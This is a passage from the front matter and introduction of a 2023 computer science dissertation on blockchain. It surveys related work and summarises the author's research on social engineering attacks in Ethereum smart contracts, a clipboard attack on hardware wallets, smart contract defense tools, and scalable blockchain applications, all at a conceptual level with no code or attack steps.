ADDRESSING SECURITY, SCALABILITY, AND USABILITY CHALLENGES OF
       BLOCKCHAIN INTEGRATION WITH THE SMART WORLD
                                    By
                              Nikolay Ivanov
                            A DISSERTATION
                                Submitted to
                        Michigan State University
                in partial fulfillment of the requirements
                             for the degree of
               Computer Science—Doctor of Philosophy
                                   2023


                                             ABSTRACT
    In recent decades, we have witnessed a convergence of multiple technologies into the inte-
grated ever-evolving Smart World ecosystem. The ongoing evolution of the Smart World is shaped
by cross-technological integration, as well as the adoption of new technologies into the ecosys-
tem. Particularly, academia and industry envision blockchain technology as one of the major new
additions to the Smart World. However, the adoption of blockchain technology is impeded by
three major practical challenges: security, scalability, and usability. This dissertation aims at ad-
dressing these three challenges by focusing on revealing new blockchain attacks, facilitating threat
mitigation in smart contracts, and introducing new trust-free applications of blockchain technol-
ogy. First, this dissertation addresses some security challenges of blockchain largely overlooked
in existing research. We discovered six zero-day social engineering attacks in Ethereum smart
contracts and propose measures to address them. Furthermore, we introduce a new attack against
hardware crypto wallets, confirmed by the manufacturers of the wallets, which evades security ver-
ification by user. Second, the dissertation elaborates on defending smart contracts against attacks.
We design a comprehensive five-dimensional classification taxonomy of smart contract defense
tools and classify 133 existing threat mitigation solutions using our taxonomy. Next, we introduce
a new smart contract security testing approach called transaction encapsulation, and implement a
transaction testing tool, which reveals the actual outcomes (either benign or malicious) of Ethereum
transactions. Third, the dissertation introduces novel practical blockchain applications that exhibit
increased security, privacy, and user control compared to other distributed solutions. We propose a
framework that uses a single Ethereum smart contract for enabling high-performance scalable smart
contracts on the cloud. Finally, the dissertation introduces a solution that uses Ethereum smart con-
tracts for leveraging decentralized networks of WiFi hotspots with cross-domain authentication and
automated QoS enforcement. We implemented and thoroughly evaluated all the proposed attacks,
defenses, and frameworks thereby confirming the real-world applicability of our work. The disser-
tation concludes with an outlook of our ongoing and future efforts to further address the practical
challenges associated with the integration of blockchain into the Smart World ecosystem.


Copyright by
NIKOLAY IVANOV
2023


To Anya, Mark, and Erik for their love and support.
                       iv


                                     ACKNOWLEDGMENTS
    I would like to express my heartfelt gratitude towards my advisor, Dr. Qiben Yan, for being my
mentor and research partner since the first day I jointed his lab; his patience, wisdom, and devotion
to students’ success are truly inspiring. Thank you, Dr. Yan, for believing in me and empowering
me to believe in myself!
    I am thankful to Dr. Li Xiao for helping me navigate the intricacies of my Ph.D. program,
serving in my Qualifying and Guidance committees, offering multiple opportunities for academic
growth, and helping me with fellowship and faculty job applications. I am thankful to Dr. Matt
Mutka for his service in my Guidance committee, thoughtful feedback on my research, and helping
me in my faculty job applications. I am thankful to Dr. Jian Ren for his service in my Guidance
committee and important feedback on my research from the engineering perspective.
    I am thankful to my past and present colleagues from THINK Lab and SEIT Lab — Dr. Mohan-
nad Alhanahnah, Boyan Hu, Qi Xia, Qicheng Lin, Jianzhi Lou, Hanqing Guo, Guangjing Wang,
Bocheng Chen, Yuanda Wang, Ce Zhou, Anurag Kompalli, Jon Gorman, Max Danley, Eric Ranes,
and Simon Harmata.
    I am thankful to the external research collaborators and mentors that I had the honor to work
with: Dr. Yunhao Liu (Tsinghua University), Chenning Li (Massachusetts Institute of Technology),
Dr. Qingyang Wang (Louisiana State University), Dr. Ting Chen (University of Electronic Science
and Technology of China), Dr. Xiapu Luo (The Hong Kong Polytechnic University), and Zhiyuan
Sun (King’s College London). I am grateful to many faculty members from Southwest Minnesota
State University, University of Nebraska—Lincoln, and Michigan State University for helping me
navigate academia: Dr. Shushuang Man, Dr. Daniel Kaiser, Prof. Kourosh Mortezapour, Dr. Don
Robertson, Dr. Teresa Henning, Dr. Lori Baker, Dr. Tom Williford, Dr. Thomas Dilley, Dr. Vaughn
Gehle, Dr. Huang Mu-wan, Dr. Wije Wijesiri, Dr. Massimiliano Pierobon, Dr. Zhichao Cao, Dr.
Charles Ofria, Dr. Arun Ross, Dr. Abdol-Hossein Esfahanian, and Dr. Charles Owen.
    Most importantly, I am thankful to my wife Anya, my sons, Mark and Erik, and my mother
Julia — for their love, support, patience, and believing in me.
                                                   v


                                  TABLE OF CONTENTS
CHAPTER 1: INTRODUCTION .          . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
  1.1: Related Work . . . . . . .  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
  1.2: Research Scope . . . . .    . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11
  1.3: Organization . . . . . . .  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
CHAPTER 2: SOCIAL ENGINEERING IN ETHEREUM SMART CONTRACTS                              . . . . .  15
  2.1: Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .  . . . . .  15
  2.2: Background . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .    . . . . .  18
  2.3: Threat Model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .  . . . . .  19
  2.4: Social Engineering Attacks . . . . . . . . . . . . . . . . . . . . . . . . .    . . . . .  22
  2.5: Case Study of Real-world Smart Contracts . . . . . . . . . . . . . . . . .      . . . . .  34
  2.6: Evaluation and Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . .   . . . . .  37
  2.7: Security Recommendations . . . . . . . . . . . . . . . . . . . . . . . . .      . . . . .  44
  2.8: Chapter Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .     . . . . .  45
CHAPTER 3: ATTACKING HARDWARE WALLETS                    . . . . . . . . . . . . . . . . . . . .  47
  3.1: Introduction . . . . . . . . . . . . . . . . . .  . . . . . . . . . . . . . . . . . . . .  47
  3.2: EthClipper Attack Design and Analysis . . . .     . . . . . . . . . . . . . . . . . . . .  51
  3.3: Implementation and Evaluation . . . . . . . .     . . . . . . . . . . . . . . . . . . . .  60
  3.4: Security Recommendations and Defense . . .        . . . . . . . . . . . . . . . . . . . .  67
  3.5: Related Work . . . . . . . . . . . . . . . . . .  . . . . . . . . . . . . . . . . . . . .  68
  3.6: Chapter Summary . . . . . . . . . . . . . . .     . . . . . . . . . . . . . . . . . . . .  69
CHAPTER 4: TAXONOMY OF DEFENSE SOLUTIONS FOR SMART CONTRACTS                                 . .  70
  4.1: Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .  . .  70
  4.2: Prior Surveys . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .  73
  4.3: Methodology . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .   . .  76
  4.4: Threat Mitigation Classification . . . . . . . . . . . . . . . . . . . . . . . . . .  . .  82
  4.5: Design Workflows of Threat Mitigation Methods . . . . . . . . . . . . . . . . .       . .  94
  4.6: Vulnerability Coverage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .  . . 103
  4.7: Trends and Perspectives . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .   . . 104
  4.8: Chapter Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .     . . 110
CHAPTER 5: CONTEXT-AWARE USER-CENTERED TRANSACTION TESTING                               . . . . 111
  5.1: Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .  . . . . 111
  5.2: Background . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .    . . . . 114
  5.3: Motivating Example . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .    . . . . 115
  5.4: Preliminaries . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 116
  5.5: TxT: Transaction Testing Framework . . . . . . . . . . . . . . . . . . . . .      . . . . 121
  5.6: Implementation and Evaluation . . . . . . . . . . . . . . . . . . . . . . . .     . . . . 135
  5.7: Limitations and Discussion . . . . . . . . . . . . . . . . . . . . . . . . . .    . . . . 142
  5.8: Chapter Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .     . . . . 144
                                                vi


CHAPTER 6: SMART CONTRACTS ON THE CLOUD                     . . . . . . . . . . . . . . . . . . . 145
   6.1: Introduction . . . . . . . . . . . . . . . . . . .  . . . . . . . . . . . . . . . . . . . 145
   6.2: Comparison with SOTA . . . . . . . . . . . . .      . . . . . . . . . . . . . . . . . . . 148
   6.3: System Design . . . . . . . . . . . . . . . . . .   . . . . . . . . . . . . . . . . . . . 149
   6.4: Scalability Analysis . . . . . . . . . . . . . . .  . . . . . . . . . . . . . . . . . . . 159
   6.5: Security Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 162
   6.6: Implementation and Evaluation . . . . . . . . .     . . . . . . . . . . . . . . . . . . . 164
   6.7: Chapter Summary . . . . . . . . . . . . . . . .     . . . . . . . . . . . . . . . . . . . 169
CHAPTER 7: DECENTRALIZED NETWORK OF WI-FI HOTSPOTS                          . . . . . . . . . . . 171
   7.1: Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . .  . . . . . . . . . . . 171
   7.2: Background and Key Insights . . . . . . . . . . . . . . . . . .     . . . . . . . . . . . 174
   7.3: The SmartWiFi System . . . . . . . . . . . . . . . . . . . . .      . . . . . . . . . . . 176
   7.4: Security Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 183
   7.5: Implementation . . . . . . . . . . . . . . . . . . . . . . . . . .  . . . . . . . . . . . 184
   7.6: Evaluation . . . . . . . . . . . . . . . . . . . . . . . . . . . .  . . . . . . . . . . . 186
   7.7: Chapter Summary . . . . . . . . . . . . . . . . . . . . . . . .     . . . . . . . . . . . 194
CHAPTER 8: CONCLUSION . . .           . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 195
   8.1: Summary of Contributions .    . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 195
   8.2: Limitations and Discussion    . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 198
   8.3: Lessons Learned . . . . . .   . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 203
   8.4: Future Work . . . . . . . .   . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 205
BIBLIOGRAPHY . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 206
APPENDIX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 230
                                                vii


CHAPTER 1: INTRODUCTION
The world is experiencing the emergence and rapid growth of various information and engineering
technologies, including, but not limited to: Internet of Things (IoT), distributed systems, mobile
computing, artificial intelligence, autonomous and semi-autonomous vehicles, space technology,
digital finance, smart health care, big data, wireless communication, smart agriculture, Industry
4.0 [181], and smart cities — to name a few. Evidently, not only do these technologies appear and
evolve within themselves, but also they converge into an integrated ecosystem — the ever-evolving
Smart World [143].
    The ongoing evolution of the Smart World is manifested by an increasing cross-technological
integration as well as the adoption of new technologies into the ecosystem [195]. Particularly, the
academia and industry envision the blockchain technology as one of the major new additions to the
Smart World [81,82,164,190,238,251,259,300,306]. The blockchain technology allows to imple-
ment and automatically enforce fine-tuned communication and authorization protocols encoded in
smart contracts, which eliminate by design such events as data falsification, lost records, repudia-
tion, and untraceable sources. Multiple studies demonstrate [128,253,254,257] that complexity and
size of the trusted code adversely affect the security of a system. To avoid negative consequences
caused by the growing complexity of scaling computer systems, security design solutions have
been proposed based on the blockchain technology. While public blockchains are predominantly
used for cryptocurrencies and decentralized tokens, permissioned blockchains are used by busi-
nesses and governments, as they allow multiple parties, who do not necessarily trust one another,
to establish a shared digital ecosystem with a set of predetermined automatically enfoced policies.
According to Deloitte’s 2019 Global Blockchain Survey [129, 155] encompassing 1,386 senior ex-
ecutives, 53% of companies worth $500 million or more, place blockchain integration within 5
top most critical priorities. Adopted by multiple businesses and governments, the blockchain tech-
nology allows to contain the entropy of complex systems, especially those involving data flows
                                                  1


and transactions between multiple independent organizations. To facilitate the integration of the
blockchain technology into existing IT infrastructure, a number of ready-to-use platforms, such as
Hyperledger [53], have been developed.
                                          Table 1.1: Overview of the scope of this dissertation.
                                                                                             Challenges Addressed
                            Chapter                 Related Publication†                   SECURITY   SCALABILITY   USABILITY
                                            N. Ivanov, J. Lou, T. Chen, J. Li, Q. Yan
                                        Targeting the Weakest Link: Social Engineering
                                                                                                          #            #
   PART I: ATTACKS
                            Chapter 2
                                              Attacks in Ethereum Smart Contracts
                                                     ACM ASIA CCS 2021
                                                        N. Ivanov, Q. Yan
                                         EthClipper: A Clipboard Meddling Attack on
                            Chapter 3                                                                                  #
                                                                                                                       G
                                         Hardware Wallets with Address Verif. Evasion                     #
                                                         IEEE CNS 2021
                                        N. Ivanov, C. Li, Z. Sun, Z. Cao, X. Luo, Q. Yan
   PART II: DEFENSE
                            Chapter 4            Security Threat Mitigation For                           #            #
                                                                                                                       G
                                                   Smart Contracts: A Survey
                                        To appear at ACM Computing Surveys (CSUR)
                                                N. Ivanov, A. Kompalli, Q. Yan.
                                           TxT: Real-time Transaction Encapsulation
                            Chapter 5                                                                     #
                                                                                                          G
                                                 for Ethereum Smart Contracts
                                                         IEEE TIFS 2023
                                                  N. Ivanov, Q. Yan, Q. Wang
   PART III: APPLICATIONS
                                            Blockumulus: A Scalable Framework for
                            Chapter 6                                                        #                         #
                                                                                                                       G
                                                 Smart Contracts on the Cloud †
                                                       IEEE ICDCS 2021
                                                   N. Ivanov, J. Lou, Q. Yan.
                                            SmartWiFi: Universal and Secure Smart
                            Chapter 7                                                        #
                                                                                             G
                                                Contract-Enabled WiFi Hotspot
                                                    EAI SecureComm 2020
                     — primaty focus; G  # — partial focus; # — not addressed.
   †
    The author of this dissertation (in bold), is the main contributor to all these papers,
   and the primary research advisor of all these publications is Dr. Qiben Yan (underlined).
      Unfortunately, the integration of the blockchain technology into the Smart World ecosystem
faces two major practical challenges: security [185, 309] scalability [179, 308], and usability [121,
213]. In this dissertation, we aim at addressing multiple aspects of the above triad of challenges
largely overlooked by current studies. Since the majority of our solutions simultaneously target
                                                                      2


some subsets of the three challenges, this dissertation organizes the solutions based on their core
approach rather than challenges it intends to address, as summarized in Table 1.1. Specifically,
we identify three major approaches described in this dissertation: revealing attacks, facilitating de-
fense, and designing novel blockchain applications. We further outline the plan for future work, in
which we continue addressing the security, scalability, and usability issues that impede the practical
adoption of blockchain.
1.1: Related Work
This section summarizes the most influential pieces of existing literature related to the research in
this dissertation, subdivided into five major categories: social engineering and phishing, security
of hardware wallets, smart contract defense, blockchain scalability improvements, and wireless
hotspot networks. Each category summarizes state-of-the-art research followed by a brief discus-
sion of the contribution of this dissertation.
1.1.1: Social Engineering and Phishing
The study of social engineering attacks in Ethereum is limited to honeypots — deceptive smart
contracts targeting users who attempt to exploit known vulnerabilities of smart contracts. Torres
et al. [270] present a taxonomy of honeypots, while Zhou et al. [309] later discover 51 previously
undetected honeypots. Although Ethereum honeypots is definitely a subclass of social engineering
attacks, these contracts are harmless for ordinary users, as their potential victims are opportunistic
malicious players.
    Social engineering attacks are known outside of the blockchain domain. Fu et al. [124] present a
methodology for defending against such attacks, and develop a Unicode character similarity list and
attack detection tool, IDN-SecuChecker. Holgers et al. [150] conduct a measurement study of IDN
homograph attacks, which shows their real-world impact. Email/URL phishing and Ethereum so-
cial engineering attacks both target human cognitive biases. Phishing attacks have been thoroughly
studied in recent years [102, 149, 151, 218, 219, 266, 273]. However, the unique characteristics of
smart contracts, such as open execution, fee-charging transactions, and non-interactive properties,
                                                  3


make the design of their social engineering attacks significantly different from traditional phishing
attacks.
Contribution of this Dissertation: The research described in this dissertation is the first to sys-
tematically study social engineering techniques in Ethereum smart contracts. Specifically, this
dissertation highlights a largely overlooked class of social engineering attacks in Ethereum smart
contracts. These attacks exploit human cognitive biases as new attacking vectors. We identified
these biases and developed six zero-day social engineering attacks. By embedding most of these
attacks into existing popular tokens, we demonstrated that the attacks have the potential to victim-
ize a large group of normal users. Moreover, the attacks remain dormant during testing and only
activate after a production deployment.
1.1.2: Security of Hardware Wallets
Guri et al. [138] demonstrate a technique that allows for an attacker to exfiltrate private keys from
a hardware wallet by installing a malware directly on the wallet’s firmware. Gutoski et al. [139]
show that the hierarchical deterministic (HD) wallet design, used in all popular hardware wallets,
allows to reveal all the private keys in the hierarchy if only one of the private keys is leaked; this
research further proposes a new design of an HD wallet that allows to avoid such key co-dependency.
Several works in wireless sensing [184] demonstrate the ability to steal passcodes from personal
devices, possibly including hardware wallets. The above adversarial scenarios, however, assume
that either the attacker has a physical access to the hardware wallet, or there is a partial leak of
wallet credentials. Datko et al. [104] demonstrate how the firmware of some hardware wallets
can be attacked to steal the user PIN code. San Pedro et al. [246] explore side-channel attacks
that allow to extract PIN codes and private keys from Trezor One hardware wallet — although the
vulnerability has been timely patched by the manufacturer, it demonstrates that the hardware and
firmware components of hardware wallets can also be attacked. Gkaniatsou et al. [131] show how
the low-level local communication protocol between the client software and the hardware wallet
can be used for side-channel attacks.
                                                   4


Contribution of this Dissertation: This dissertation proposes a new hybrid EthClipper attack,
which zeroes in on the adversarial actions that the real world attackers have been using successfully
for decades, i.e., malware infestation of user computers and social engineering. We demonstrated
that it is possible to compromise the air-gapped security of a hardware wallet and fool its owner
into confirming a malicious transaction, even without jeopardizing the integrity of the wallet itself.
Our EthClipper attack, which is confirmed to be potentially dangerous by the manufacturers of
three leading hardware wallet firms, not only falsifies the input to the hardware wallet, but it also
crafts the address in a way that allows to circumvent the transaction verification procedure. Our
evaluation confirms that the attack can be carried out with a limited budget on a retail equipment.
1.1.3: Smart Contract Defense
Code-based defense tools use source code, bytecode and/or ABI maps for finding bugs and vulner-
abilities in smart contracts. One of the most popular code-based approaches is symbolic execution,
represented by Mythril [215], Oyente [200], and Maian [223]. SmarTest [260] uses a language-
based model for guiding symbolic execution and generating malicious transaction sequences. Static
analyzers and formal verifiers, such as Securify [271], EthBMC [122], VerX [230], and Vandal [76]
attempt to extract semantics and other facts from the code for finding violation of safety pat-
terns. Many static analysis tools zero in on specific security issues. For example, ZEUS [168],
Osiris [269], and VeriSmart [261] focus on arithmetic bugs; ECFChecker [137], Sereum [240], and
SeRIF [83] address reentrancy; TokenScope [96] targets security issues of ERC-20 tokens. How-
ever, the major drawback of code-based defense approaches is the probabilistic nature of the result,
which incurs non-negligible false positives/negatives.
    Smart contract testers allow to generate and execute transactions to unveil vulnerabilities or
semantic violations. Manual testing methods include tools like Waffle [7] and Solidity Cover-
age [6]. In order to enhance the ability of the test tools to reveal vulnerabilities, a number of smart
contract fuzzing methods have been proposed, including Harvey [291], Confuzzius [119], Contract-
Fuzzer [163], and sFuzz [221]. These testing methods try to find transaction parameters that would
                                                   5


confirm the safety of a smart contract or reveal a vulnerability. However, the search space for
the candidate parameters is usually too large to exhaust all the possible values (the path explosion
problem); as a result, the testing methods only use some sample sets of parameters or heuristically
determined combinations of parameters — resulting in overlooked vulnerabilities.
    Unlike code-base defense tools, which statically scrutinize source code or bytecode of smart
contracts, the transaction-based defense tools analyze historical transactions stored in the blockchain,
or intercept the incoming transactions in real time. TxSpector [299] and EthScope [289] deliver
frameworks for retrospective vulnerability search using Ethereum transactions. SODA [94] and
Ægis [117] are tools for online interception of malicious transactions. Qin et al. [235] describe a
transaction replay scheme, but it is only used to demonstrate a front-running attack, not for defense.
Evidently, none of the existing transaction-based methods provide a definitive result to ensure the
transaction safety.
Contribution of this Dissertation: This dissertation surveyed the full spectrum of smart contract
threat mitigation solutions in this work. We presented a general taxonomy for the classification of
such solutions, which applies to today’s methods and is suitable for future methods, even if new
paradigms, blockchain platforms, or vulnerabilities appear. Using this taxonomy, we classified
133 existing smart contract threat mitigation solutions. We identified eight distinct core defense
methods employed by the existing solutions and developed synthesized workflows of these core
methods. We studied the ability of the existing smart contract threat mitigation solutions to address
the known vulnerabilities. We conducted an evidence-based evolutionary study of smart contract
threat mitigation solutions to outline trends and perspectives. To further benefit the community of
smart contract security researchers, users, and developers, we deployed an open-source, regularly
updated online registry for smart contract threat mitigation. Furthermore, in this dissertation, we
proposed a transaction-based dynamic interceptor, called TxT, that deterministically verifies the
safety of transactions, or refuses to give an answer in case of uncertainty. In contrast with previous
defense solutions, TxT provides the user with an actual outcome of a transaction applied to the
current state of blockchain. Instead of predicting future transaction parameters, TxT tests the exact
                                                   6


transactions the user is going to submit. Moreover, in addition to replaying the transaction, TxT
also addresses the notorious TOCTOU challenge by assessing the expiration and replicability of
the test transaction.
1.1.4: Blockchain Scalability Improvements
There have been various solutions proposed for improving the performance and scalability of
blockchain which we subdivide into five major groups: 1) off-chain execution, 2) side- and cross-
chaining, 3) sharding and alternative consensus, 4) network optimizations and payment channels,
and 5) alternative blockchain architectures.
Off-Chain Execution: Off-chain execution is an arrangement that allows to perform computation
of some portions of smart contracts outside of the blockchain to improve performance and reduce
costs. Ekiden [98] addresses the lack of confidentiality and poor performance of blockchain by
securing an off-chain computation via trusted execution environment (TEE) technology. Despite
significant performance improvement, the operation of Ekiden relies on the availability of crowd-
sourced consensus and compute nodes. The security of the system is founded on the assumption
that the participants have Sybil-resistant identities (i.e., they cannot create multiple fake accounts).
The requirement for a participation deposit to prevent Sybil attacks may not only be ineffective
against wealthy attackers, but may also reduce the incentive for community participation. Another
off-chain execution solution, ZEXE, is proposed for abundant private off-chain computation [71].
Unlike Ekiden, ZEXE does not require hardware TEE enclaves, and therefore can be used in a
wider scope of platforms. However, this system focuses on improving the computation scalabil-
ity and reducing communication overhead, whereas the scalability issue in storage and transaction
throughput remains unaddressed.
Side-Chaining and Cross-Chaining: Side-chaining is an arrangement in which some smart con-
tract execution is outsourced to a different blockchain, while cross-chaining is a way for inde-
pendent blockchains to share resources and use common assets. Plasma [231] attempts to reduce
fees and improve performance of Ethereum blockchain by linking a smart contract to a tree of
                                                    7


child blockchains. Although Plasma distributes the computation load of the master smart contract
among multiple chains, the transaction throughput remains a likely bottleneck, and there is no solid
evidence of significant improvement of storage capacity. A popular cross-chaining solution called
Polkadot [287] improves transaction throughput by creating a network of interoperable blockchains.
However, the solution does not directly address the storage and compute capacity for smart con-
tracts.
Sharding and Alternative Consensus: The concept of sharding involves selecting a subset of
nodes to serve as temporary representatives in a decentralized consensus, which curbs the perfor-
mance degradation associated with gossip broadcasts in large blockchain networks. Algorand [130]
proposes a blockchain with improved performance using a sharding scheme based on a verifiable
random function. Algorand delivers a significant increase in transaction throughput compared to
classic public blockchains, but its operation relies on a set of assumptions that can be refuted by
massive denial-of-service or Sybil attacks. Specifically, Algorand assumes that at least 95% of all
honest users must be able to send messages to other honest users, and the overall share of honest
participants must be greater than 2/3. Another solution with sharding-based consensus is Rapid-
chain [298], which delivers high transaction throughput. However, Rapidchain is not scalable in
terms of data storage and compute capacity.
     Some alternative consensus models attempt to replace a compute-heavy PoW algorithm with
lightweight alternatives, such as proof-of-stake (PoS), in which the voting power is determined by
the amount of funds in possession of a node. Ouroboros [173] is a provably secure blockchain with
PoS consensus. Unfortunately, existing alternative consensuses fail to address the full spectrum
of scalability problems, and they introduce a significant fairness challenges, such as “monetary
hegemony”. Yu et al. [297] propose a lightweight consensus protocol, OHIE, to improve blockchain
scalability by leveraging a parallel execution of the Nakamoto consensus. Despite the improvement
in transaction throughput and available bandwidth, the scalability of storage and computation is not
considered in OHIE.
Network Optimizations and Payment Channels: Off-chain payment channels have been pro-
                                                    8


posed to improve performance and reduce fees associated with financial transactions. The Light-
ning Network protocol [232] allows to create off-chain micropayment channels. Perun [110] is
another proposal of a payment channel that improves routing of transactions. Although off-chain
payment channels have been adopted by real-world applications, they cannot serve as alternatives
of public blockchains because of their specific focus (only for payment) and the necessity to or-
chestrate a network of crowdsourced participants.
Alternative Architectures: Researchers have been re-thinking the architecture of blockchain in
order to improve performance and scalability. SPECTRE [262] proposes a reorganization of a
traditional Nakamoto blockchain into a directed acyclic graph (DAG). Although it improves the
speed of transactions, it could not be used for general-purpose smart contracts that may require
abundant data storage and heavy computation.
Contribution of this Dissertation: In this dissertation, we proposed the first scalable framework,
called Blockumulus, for deploying decentralized smart contracts on the cloud — to address the
blockchain scalability limitations on three dimensions: transaction throughput, data storage, and
computation. Blockumulus employs a novel overlay consensus which delivers decentralization to
smart contracts in a centralized cloud instead of random P2P network nodes. Concretely, a consor-
tium of centralized cloud computing nodes can host a permissionless smart contract environment
where clients can control the execution of their customized contracts and manage the data stored
by these contracts. Our evaluation on Microsoft Azure shows that Blockumulus can execute tens
of thousands of transactions within a minute, which is on par with the average throughput of world-
wide credit card transactions. By integrating the decentralization of smart contracts and the scal-
ability feature of the cloud, Blockumulus takes the first step towards high-performance data-rich
smart contracts with high transaction throughput.
1.1.5: Wireless Hotspot Networks
WiFi hotspots are often operate as networks for improvement of coverage, mobility, authentication,
and payment. Industry and academia proposed a number of approaches for WiFi hotspot networks,
                                                  9


which we subdivide into two general categories: traditional solutions and blockchain solutions.
Traditional WiFi Hotspot Solutions: Current non-blockchain WiFi hotspot solutions are repre-
sented either by manual setups, or cloud-managed subscription-based proprietary products, such
as Cisco Meraki [8], Aruba [9], Ruckus [14], and similar solutions. However, none of these ap-
proaches simultaneously addresses all of the following objectives: a) enhancing hotspot security
against malicious routers and clients; b) providing universal authentication and billing; and c) mak-
ing payment based on service quality.
Blockchain Solutions: OPPay [252] is a peer-to-peer opportunistic data service system. However,
the OPPay-based solution is impractical for a WiFi hotspot, as it incurs high fees and does not
offer QoS measurement for sustaining a reliable service. A commercial project WinQ [15] has
been in development since 2016. Advertised as a blockchain-enabled mobile WiFi hotspot, the
solution was intended to operate on its own blockchain called QLC Chain [13]. We installed both
the Android and iOS apps to discover that the system is activated only on testnet blockchain, which
was practically unavailable.
Dynamic Speed Evaluation: QDASH was proposed for dynamic speed measurement [210], which
is based on the assumption that the user traffic is available to the client connection handler. This
requirement makes QDASH and its derivatives unsuitable for use by SmartWiFi clients. Xylo-
phone [292] observes the behavior of TCP ACK and RST packets for speed measurement. Al-
though the technique accurately estimates the bandwidth, it requires extended permissions for the
client to capture TCP packets, which are usually not available on Android and iOS without root-
ing/jailbreaking.
Contribution of this Dissertation: In this dissertation, we proposed SmartWiFi, a smart contract-
enabled WiFi hotspot system, which provides universal accessibility, cross-domain authentication,
association of QoS and payment, and security enhancement. SmartWiFi utilizes a novel crypto-
graphic mechanism, Hansa, to establish connection. Hansa provides low-cost off-chain execution
by restricting otherwise unacceptable smart contract fees, and significantly reduces delays associ-
ated with smart contract interaction. To validate the feasibility of SmartWiFi system, we designed
                                                 10


and implemented a SmartWiFi prototype using an Ethereum smart contract. The experimental re-
sults show that SmartWiFi exhibits low operational delays, minimum communication overhead, and
small blockchain fees. We demonstrated that SmartWiFi is a scalable, secure, and efficient WiFi
hotspot solution, which can be easily deployed in a variety of systems with minimal intervention.
1.2: Research Scope
1.2.1: Attacks on Smart Contracts
Ethereum holds multiple billions of U.S. dollars in the form of Ether cryptocurrency and ERC-20
tokens, with millions of deployed smart contracts algorithmically operating these funds. Unsur-
prisingly, the security of Ethereum smart contracts has been under rigorous scrutiny. In recent
years, numerous defense tools have been developed to detect different types of smart contract code
vulnerabilities. When opportunities for exploiting code vulnerabilities diminish, the attackers start
resorting to social engineering attacks, which aim to influence humans — often the weakest link in
the system. The only known class of social engineering attacks in Ethereum are honeypots, which
plant hidden traps for attackers attempting to exploit existing vulnerabilities, thereby targeting only
a small population of potential victims. In this dissertation, we systemically explore the social en-
gineering attacks in Ethereum smart contracts largely overlooked by existing research on smart
contract security.
    Another important aspect of blockchain security is identity management, which is often en-
trusted to hardware crypto wallets. Hardware wallets are designed to withstand malware attacks
by isolating their private keys from the cyberspace, but they are vulnerable to the attacks that fake
an address stored in a clipboard. To prevent such attacks, a hardware wallet asks the user to verify
the recipient address shown on the wallet’s display. Since crypto addresses are long sequences of
random symbols, their manual verification becomes a difficult task. Consequently, many users of
hardware wallets elect to verify only a few symbols in the address, and this can be exploited by an
attacker. With this insight, we develop a new attack on hardware wallets and report it to the major
manufacturers of the wallets.
                                                 11


1.2.2: Smart Contract Defense
The blockchain technology, initially created for cryptocurrency, has been re-purposed for record-
ing state transitions of smart contracts — decentralized applications that can be invoked through
external transactions. Smart contracts gained popularity and accrued hundreds of billions of dol-
lars in market capitalization in recent years. Unfortunately, like all other programs, smart contracts
are prone to security vulnerabilities that have incurred multimillion-dollar damages over the past
decade. As a result, many automated threat mitigation solutions have been proposed to counter
the security issues of smart contracts. These threat mitigation solutions include various tools and
methods that are challenging to compare. In this dissertation, we develop a comprehensive five-
dimensional classification taxonomy of smart contract threat mitigation solutions and classify 133
existing threat mitigation solutions using our taxonomy.
    Among other discoveries, our classification reveals a low coverage of known vulnerabilities by
existing threat mitigation approaches. To increase the vulnerability coverage, we propose a new
smart contract security testing approach called transaction encapsulation. The core idea lies in the
local execution of transactions on a fully-synchronized yet isolated Ethereum node, which creates
a preview of outcomes of transaction sequences on the current state of blockchain. However, This
approach poses a critical technical challenge — the well-known time-of-check/time-of-use (TOC-
TOU) problem, i.e., the assurance that the final transactions will exhibit the same execution paths as
the encapsulated test transactions. To overcome this challenge, we determine the exact conditions
for guaranteed execution path replicability of the tested transactions. To demonstrate the transac-
tion encapsulation, we implement a transaction testing tool, TxT, which reveals the actual outcomes
(either benign or malicious) of Ethereum transactions. To ensure the correctness of testing, TxT
deterministically verifies whether a given sequence of transactions ensues an identical execution
path on the current state of blockchain. We analyze over 1.3 billion Ethereum transactions and de-
termine that 96.5% of them can be verified by TxT. We further show that TxT successfully reveals
the suspicious behaviors associated with 31 out of 37 vulnerabilities (83.8% coverage) in the smart
contract weakness classification (SWC) registry. In comparison, the vulnerability coverage of all
                                                   12


the existing defense approaches combined only reaches 40.5%.
1.2.3: Blockchain Efficiency and Applications
One of the most critical fundamental efficiency challenges of blockchain is scalability of public
blockchains. Public blockchains have spurred the growing popularity of decentralized transactions
and smart contracts, especially on the financial market. However, public blockchains exhibit their
limitations on the transaction throughput, storage availability, and compute capacity. To avoid
transaction gridlock, public blockchains impose large fees and per-block resource limits, making
